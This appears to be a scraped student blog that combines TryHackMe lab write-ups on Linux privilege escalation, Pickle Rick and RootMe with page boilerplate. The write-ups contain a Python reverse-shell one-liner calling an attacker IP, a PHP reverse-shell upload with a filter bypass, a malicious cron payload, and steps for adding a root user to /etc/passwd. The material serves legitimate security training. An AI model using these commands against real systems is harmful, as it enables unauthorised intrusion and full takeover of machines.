TryHackMe - Common Linux Privesc (Privilege Escalation): <https://tryhackme.com/room/commonlinuxprivesc>

This box is listed as Easy .  It provides walk-throughs and practice of common linux privilege escalation vectors.  This will not be a walk-through of the machine, but instead a reiteration of the common privesc vectors taught and practiced in the room.

# | What is Privesc?|

Let's start by discussing what "privesc" is.  Essentially, privesc (privilege escalation) is leveraging access to a low pricilege account to move to a higer privilege account (eg user to root).  Privesc can occur in two directions: horizontal and vertical.  In horizontal privesc, access is gained to an account of the same privilege level. This can be beneficial to access private files or if the new user has SUIDs we can exploit.  In vertical privesc, access is gained to an account with more access to the system (admin / root).  Read through the provided information in each of the three tasks and complete each section.

# | Enumeration |

## LinEnum

LinEnum is a bash script which performs common commands related to privesc.  It can be downloaded from:

<https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh>

Two ways to get LinEnum onto the target machine:

First - start a python webserver from the directory with your copy of LinEnum.sh. (python3 -m http.server 8000).  Then, wget the file from the target machine (wget \[LOCAL_IP]:8000/LinEnum.sh).  After it has been transfered to the target machine, make the file executable (chmod +x LinEnum.sh).

Second - Provided you have the required permissions, copy the raw code and create a .sh file in vi/nano/etc and paste the code.  Make the file executable.

LinEnum can be run as \`./LinEnum.sh\`

![](/images/LinEnum-bf8e2df3.PNG)

LinEnum provides a lot of information.  Take the time to read the provided documentation and understand what gets returned.

# | Abusing SUID/GUID Files |

a SUID is a file (as everything in Linux is) which can be run as the owner regardless of the accessing user (in this case run as root).  These can be leveraged to get a shell and root access.  SUID permissions look like:

\`rws-rwx-rwx\`

whereas GUID permissions look like:

\`rwx-rws-rwx\`

These SUID/GUIDs are reported by LinEnum, but can be searched for manually using:

\`find / -perm -u=s -type f 2>/dev/null\`

\`find - search command

/ - search entire file system

\-perm - find specific permissions

\-u=s - any of the permission bits mode are set for the file

\-type f - only searches for files

2>/dev/null - sends errors to null where they're deleted\`

![](/images/SUID.PNG)

# | Exploiting Writeable /etc/passwd |

#### Understanding /etc/passwd format

USERNAME:PASSWORD\*:USER_ID:GROUP_ID:USER_ID_INFO:HOME_DIRECTORY:COMMAND/SHELL

an x character in the password spot indicates the encrypted password is stored in /etc/shadow

Before adding a new user, a compliant password hash must be created (salt:new using new:123)

![](/images/salted%20hash.PNG)

Next, we can nano the passwd file and add our new user

![](/images/created_new-fc2f2b5d.PNG)

switch user (su) and proof of function

![](/images/new_root.PNG)

# | Escaping Vi Editor |

Once access is gained to a machine sudo -l should be ran to list what commands we can use as super user

Inside vi, :!sh will spawn a shell. :q! will quit :!bash will spawn a bash shell.

![](/images/vi-ab2c1ba6.PNG)

# | Exploiting Crontab |

Crontabs can be viewed by \`cat /etc/crontab\`

Create a msfvenom reverse netcat payload

![](/images/msfvenom.PNG)

![](/images/crontab-5b7a454c.PNG)

Replace the code in autoscript.sh with our msfvenom payload

![](/images/autoscript.PNG)

![](/images/reverse_nc-c7bacec2.PNG)

# | Exploiting PATH Variable |


TryHackMe - Common Linux Privesc

**Bryce Simpson** is a student studying Computer Science and Cybersecurity.  Bryce received a Bachelor of Arts degree in Criminology and Law from the University of California, Irvine in 2011.

As a hobby, Bryce enjoys photography.  He has had his portraiture and wild-life photographs and has had photographs featured in gallerias around the world including in Greece, Israel, England, Australia, and Portugal.  He lives in Southern California with his beautiful wife and two boys.

*Thank You for reading!*


This is a short page about me and my work.

About Me

Blog

To get in touch please fill the form below.

name

email

subject

message

consent

Contact

Follow along as I work my way through some cybersecurity training machines.


Hi, I'm Bryce Simpson.

I am a current student studying cybersecurity and computer programming. This blog functions to hold write-ups for Capture The Flag (CTF) events I have completed as well as walk-throughs for TryHackMe and HackTheBox machines.


About

Home

TryHackMe - PickleRick CTF: <https://tryhackme.com/room/picklerick>

This box is listed as Easy .  Most (if not all) of these tasks can be completed in just the browser.  However, I will be using the command line, and:

\`NMAP NETCAT GOBUSTER\`

Where available, I will be providing guidance for browser only interaction.

# ENUMERATION

First, let's start by pinging the machine and making sure we're able to connect.

![](/images/ping.png)

Everything looks good, so let's try to see which ports we have available.  I'll be using NMAP to perform this scan:

    sudo nmap -sN -Pn 10.10.19.153
         -sN -- TCP Null scan
         -Pn -- Treats all hosts as online / skip host discovery

![](/images/nmap.png)

We can see we have port 22 and port 80 open.  Let's curl the IP and see what we get back.

![](/images/a_curl_port\_80.png)

Nothing really stands out at first.  We can see we have a /assets/ directory we may be able to use later.  If we scroll down, however, we see a comment left by Rick, which gives us the Username.  We'll note this username, and be on the lookout for a login page.

Alternatively, we can navigate to \[TARGET_IP]:80, and inspect source there to get the same:

![](/images/a_inspect_source.png)

Before we jump to directory hunting, let's check for a robots.txt to get any more intel:

![](/images/a_curl_robots.png)

Curl returns a seemingly nonsense phrase that will be important later, and I have purposely blurred.  For now, we do not know its significance though.

Let's do some directory busting.  I'll be using DirBuster, and I'll be using a small wordlist that comes pre-installed in Parrot and Kali.  I'll input the target IP, as well as the file path to my list:

![](/images/dirbuster.png)

After letting the scan run for a few moments, we have some interesting results:

![](/images/a_dirbuster_return.png)

We can see both a /login.php and  a /portal.php which are interesting.  Let's navigate to the login page.

# FOOTHOLD

![](/images/login.png)

We know the Username from our notes of the HTML comment on the home page, but we don't know the password.  A quick trial of usual passwords doesn't work.  We can try a sniper attack in BurpSuite, but what about the text in /robots.txt?  Let's try that.

![](/images/command.png)

Awesome, that worked, and now we're in.  Let's check the page source for any hidden comments or bread crumbs:

![](/images/a_portal_source.png)

Nothing seems to stand out aside from the comment which appears to be Base64 encoded.  Let's make note of that and go back to /portal.php.  Let's try out a few commands we know, and see if that gets us anywhere.

![](/images/whoami.png)![](/images/ls.png)

After some trial and error, we can see that we're seemingly giving commands to a Linux machine.  We can see a 'clue.txt' and 'Sup3rS3cretPickl3Ingred.txt' in our current directory, so let's try to cat the ingredient.

![](/images/cat.png)

Ok.  That didn't work, but we have more options.  Let's wget the files and have them locally if we need them later.![](/images/wget.png)

From here, we can cat the files and see what they contain:

![](/images/a_first_ingred.png)

Awesome, we have the first ingredient as well as a hint for how to find the rest.

Alternatively, we would have been able to 'less' the .txt files and gotten their contents in the browser:

![](/images/a_less_first.png)![](/images/less_clue.png)

# REVERSE SHELL

At this point, we can continue to issue commands to the web browser panel.  However, for practice and ease of use, I chose to implement a reverse shell.  I started netcat on my machine, and listened on port 4444 (an arbitrary port).  I then issued the command

`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("\[YOUR IP]",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"]);'`

on the control panel, and was able to spawn the reverse shell:

![](/images/a_shell_open.png)

Now we can explore the machine and look for our next ingredient:

![](/images/a_shell_second.png)

# PRIVILEGE ESCALATION

Awesome.  That's the second ingredient, and we only have one left.  Unfortunately, the last one needs root access, so let's practice our privilege escalation.  I'll use another python script to sudo bash:

`python3 -c 'import pty; pty.spawn("/bin/bash")'`

Now we can cd to /root, and get into the third ingredient:

![](/images/a_shell_last.png)

That's it! We got all three ingredients.  Enter them for your points, and I'll see you in the next room.


TryHackMe - Pickle Rick CTF

TryHackMe - RootMe CTF: [https://tryhackme.com/room/rootme](http://tryhackme.com/room/rootme)

This box is listed as Easy and will be a good way to practice some of our skills like enumeration, reverse-shells, and privilege escalation.  For this walkthrough, I will be using:

`NMAP GOBUSTER NETCAT`

# Task 1: Deploy the Machine

Easy enough.  Get the machine started, and let's move to task 2.

# Task 2: Reconnaissance

Let's let NMAP run and see what preliminary information we can get first.

![](/images/nmap-7bb47228.png)

#### sudo nmap -sC -sV -oN nmap_initial 10.10.120.35

```
 **-sC**: Runs NMAP default scripts

 **-sV**: Checks for versions running

 **-oN**: Outputs the return to a file named 'nmap_initial'

 **\[target ip]**\

```

We can see there are only two services running on this machine: ssh on port 22, and an http server on port 80.

##### Scan the machine, how many ports are open?

###### 2: Port 22 and Port 80

##### What version of Apache is running?

          2.4.29

##### What service is running on port 22?

          ssh

##### Find directories on the web server using the GoBuster tool.

We can use the command 'dir' and have GoBuster use directory/file enumeration mode.:

![](/images/ant_gobuster.png)

#### gobuster dir -u http://10.10.120.35/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -z

```
 
```

After looking at the return, we can see directories for uploads and panel .  Let's go to the webserver and see what we can find.

![](/images/http.png)

There doesn't seem to be anything on the landing page, so let's take a look at panel.

![](/images/panel.png)

It looks like we have way to upload files to the server, and in conjunction with uploads I think we'll be able to access files we upload.

# Task 3: Getting a shell

Alright, we need a file we can upload which will allow us to get a reverse shell.

[My go-to for a php-reverse-shell is: https://github.com/pentestmonkey/php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell) let's grab the script there and make a few changes.

![](/images/ant_shell.py.png)

We need to set $ip to a string containing our machine IP, and $port to an integer for the port to use.  I'll be using port 4444.

Let's save this as exploit.php, and upload it to the server.

![](/images/rejected.png)

I don't speak Portuguese, but it appears that .PHP files are not permitted.  That's not a problem though, because TryHackMe has a this as a learning topic in their "Vulnversity" room: <https://tryhackme.com/room/vulnversity.> We can use a Burp Suite sniper attack and see which .php filetype the form accepts, but we'll try .phtml first because that's usually what works.

Let's change the file-type to a .phtml and try to upload it again![](/images/accepted.png)

Awesome.  We have our file uploaded, and we can confirm this by going to 10.10.120.35/uploads/

![](/images/upload.png)

Now, before we open our file on the server, let's start up netcat and listen on port 4444.  Once netcat is listening, we can access our .phtml file on the server and see that we have a reverse shell:

![](/images/reverse_shell-2482ff64.png)

Now that we're in, let's look for the file we need.  We know it's called "user.txt", so we can:

##### find . -iname "user.txt" -print 2>/dev/null

This command will find files named "user.txt" in the tree.  All error returns are sent to /dev/null to be deleted, so our console is clean.  Once we find where the file is located, we can cat the file, and read the contents:

![](/images/ant_user_flag.png)

# Task 4: Privilege Escalation

Let's start by finding files with SUID permission:

![](/images/ant_SUID.png)

Looking through the list, /usr/bin/python stands out as unusual, so let's see what we can do with SUID permission in python.  We'll navigate to <https://gtfobins.github.io/> and search SUID and python.

![](/images/SUID_search.png)

We can run the second line (less the ./ ) in our shell to escalate our privileges.  Once we are root, it's a simple task of finding root.txt, and cat the file to read its contents.

![](/images/ant_root.png)

And that's it for this box! Make sure you submit your flags, and I'll see you in the next room.


TryHackMe - RootMe CTF


Thank you for contacting me! I will get back in touch with you soon.

**Have a great day!**